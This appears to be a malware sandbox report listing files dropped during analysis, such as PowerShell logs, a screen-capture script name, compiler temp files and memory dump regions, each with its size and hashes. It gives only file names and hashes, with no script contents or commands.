36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f79387492e5d2264cb94e2f480feaf78

SHA1
13f478f478bf824d8cccb611ac9b2645d5523c93

SHA256
f7d942ea9e79af246b7a4e461133ed9434f980e837a8b96f1e35f856ddead9e7

SHA512
c1a16d6c0edeba6659f08ae115b4ed5c496063d9e4339ff0869a85295798fb66281dba43b6de8118bda69db0d34a65966f84c522b9adcf94581934438c015479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
49a1caf248166b41810556f01d32f21c

SHA1
5c3cf6f372936a4d00e91647048204976737f155

SHA256
4be69b691ae5ce2c5f99e32b0add8eb4c5afa5fde5cf3290f85bda43d264200c

SHA512
8ea07b5cf1e954bf80dd349300215611211f0e96e7e0b2e6d91e0754b4c45f64a0d8c9da6d0452c8de8a80877b255a4a29bfd8a3a5654b947632e724c1a773e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a5a5b62810f17e0c0c6c036ae8004166

SHA1
876038dbc9005d879da19a807e513a751f00ada0

SHA256
003284a99434c483af153c8360ff94b4d213f8396e75c76081b063931e0eb45f

SHA512
00e5800ff540496bca7f7e0321aa7d9904095230f07cc28281bfa7f2f896a3ff325999e1b488e9904fa4251e235ad204ad4a33cc5ab55044d111d45c53c71472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4fc1ceefa94c82f73b7ee478e2920ea3

SHA1
17a031c8d10e316478d85d24ba8a8b5ebfda3149

SHA256
018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb

SHA512
cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c864a576e3808b16c337a4ada845d8fb

SHA1
a48c107fc8698f05302172d71b7d8abcced54d81

SHA256
78a022b77161715b27f7b784742e6d8f06d84db3af9291abad78d1a5c9aac0fc

SHA512
70ab6913fa1b5310a9f9651f9c50e3bb1bd883043e111bff7517a53b77a365c9d4fef6d83cf0ccce1a589d4d568a7faef0cd4f11a0d634ea25550fc9b86b3179

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca24df1817fa1aa670674846e5d41614

SHA1
dac66ea013bcc46d24f1ece855568187c6080eaf

SHA256
3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db

SHA512
fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
8fd21d84003fd8269ffd9d30808d7ab9

SHA1
2cbf3ed27e138ee38e49b0163d9969eccbec986f

SHA256
564cb518a724e03044c45f268be58c58ff4c440466e16b4f46abd83b542bff55

SHA512
1bca3926e55019148a32e27edb9bda094844e9e960521edf1c8252690a7a8457b08ee84f5fefb09686bd36e34c714ac428812d9f6beaa03b298725d841159f97

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA2D7.tmp

Filesize
1KB

MD5
cf59d5ccd195e2959faec3e5a9215c5f

SHA1
44ab38521aed4fb1ac669521f9755f54a36c8397

SHA256
fa87235ff1af2fe1e6f036ed4d038ddde2ea43b73ff2a5162438ed2897c91b17

SHA512
fb849e48ed97910228c6417c809ea4bbd5be1fcb9eecbba8f86ec04f36bf1deb9cb013c73cc051f4606d89b398fed6f4e40873184b2eeb20ee1aa59985207375

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESADF3.tmp

Filesize
1KB

MD5
a3d0ba49ac186f485ce439d6c2af72b1

SHA1
0bf30efb3495790a136cde5bdfe4720a947445b6

SHA256
94cf33b1e248d26c16bc9bd0fe155a2b7f3414289b348fcbfa2fe2756ababdd4

SHA512
3f4906b2bef0b6b0709ff1ca6bc4f7785d1f849ddde96851dcef734813e99ddabcff836ae16c0a08c0762a5178b370e994a61304c652d32bc59e396f0ea5e4b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oicdvdzf.ovo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bkcrgoxd\bkcrgoxd.dll

Filesize
3KB

MD5
836766e884d1b2d336d595f1a47a2bf3

SHA1
049641db20da7fb6f44d7b50c85f43adb03a183f

SHA256
d717c30fc8269d1a2c5493508a653aa5f0fbd7ddb62a1c65d76af82ada850fa8

SHA512
c90e92f072f7ab2f78062701f2a6a3959102592c6470d91bd0224a34111d49e2567e173f95c8e5980c1293afbe17a682fc7c855808a3b0c051eea87c27d0ba4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\v0a2cqpi\v0a2cqpi.dll

Filesize
3KB

MD5
60f528ffecf170e5004f253c50273522

SHA1
de77931ef63a85ad55b84fa0ddd1f9fdf694fa39

SHA256
4298f1146790cd4605b43b1174761bf40433fb62cb241234e54fee065d3fe765

SHA512
1a47541240b0da837838222fd238d7752287be1ba3e609ebf3622b92f291fd252a667705ef6f46ce6c8f19a3bc7f66702b8cffac590e62608d8e240f094a3898

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bkcrgoxd\CSC7BD45C62E23B4B96A73F8DB6CCDA415B.TMP

Filesize
652B

MD5
e7991f710f73b634d1509ecfd76171b9

SHA1
4ed451c1b75c5e409154347be578a4d58e2c898d

SHA256
81f345c173829b426741788bd95864b6d9e2c6b2d2a62c08aea0fa701c885c95

SHA512
41c7fc586e476b7411dde2f391c01ef58b754796576961c786a3fb2104f6c406aedbf4f9cf56d2da4cbcdc42300e2b4f5f50635ab5641f8737cf31a79894d7a5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bkcrgoxd\bkcrgoxd.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bkcrgoxd\bkcrgoxd.cmdline

Filesize
369B

MD5
e2e2bbb85b5907db9eea1adf6f94da36

SHA1
8d5d9c85bda1d871f72771b81683273b1f408a69

SHA256
66d4d60689eb2dcf0c79a7f5a934e7722be5b091b00b10fa4c321cfa8b28235f

SHA512
975f5820ac1a14c8e5cd6c74fbb5a8bc92e9c6d99c4c286fc357f66b0e966da6b1ddbb4ff5f610917aa375242b8c029e442c8325386ae9efc16b8529961c1ca7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v0a2cqpi\CSC5D0B6935457040CEABD9802AF0A12845.TMP

Filesize
652B

MD5
6588db4c4597c5065aa214d8192126db

SHA1
586c46f28dabe104f3598082b9532d6501da6c02

SHA256
230f2ddd7462f90070e21b1e221dd48abbb6e39cebda10a262d5dc6d869a3fd9

SHA512
621dcf7ff6cc69551d36093dad1cc2cf33b197f11c52e28c86c72a01f7f7f9b6ff51223b704aacdd87eabccf81dd770775193a17ebec66b31f1307602d3e6ca4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v0a2cqpi\v0a2cqpi.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\v0a2cqpi\v0a2cqpi.cmdline

Filesize
369B

MD5
fd12080463b28c99e0f6dbf1d9bb4a75

SHA1
79fd3d723d60b999d4507b183b206fbea988cc5c

SHA256
29200dd7809c197e74d535a3b19e79adda411059a3e49f443aad6f49ff6ef83e

SHA512
2680e4066e1575fd2c93fbc512d3246fe62137803f167c9f912d0380d76053df576cccafb6298e8bf0a19b8013f30afde5976a407293e732d46f890fed9b7a2e

Download Submit
memory/2408-115-0x000001CD6CBE0000-0x000001CD6CC30000-memory.dmp

Filesize
320KB

Download
memory/4288-86-0x000001BC5BEB0000-0x000001BC5BF26000-memory.dmp

Filesize
472KB

Download
memory/4288-83-0x00007FFE51310000-0x00007FFE51DD1000-memory.dmp

Filesize
10.8MB

Download
memory/4288-82-0x000001BC5B9F0000-0x000001BC5BA12000-memory.dmp

Filesize
136KB

Download
memory/4288-72-0x00007FFE51313000-0x00007FFE51315000-memory.dmp

Filesize
8KB

Download
memory/4288-84-0x00007FFE51310000-0x00007FFE51DD1000-memory.dmp

Filesize
10.8MB

Download
memory/4288-85-0x000001BC5BA70000-0x000001BC5BAB4000-memory.dmp

Filesize
272KB

Download
memory/4288-103-0x00007FFE51310000-0x00007FFE51DD1000-memory.dmp

Filesize
10.8MB

Download
memory/4288-99-0x000001BC59860000-0x000001BC59868000-memory.dmp

Filesize
32KB

Download
memory/5088-190-0x00000201B7940000-0x00000201B7948000-memory.dmp

Filesize
32KB

Download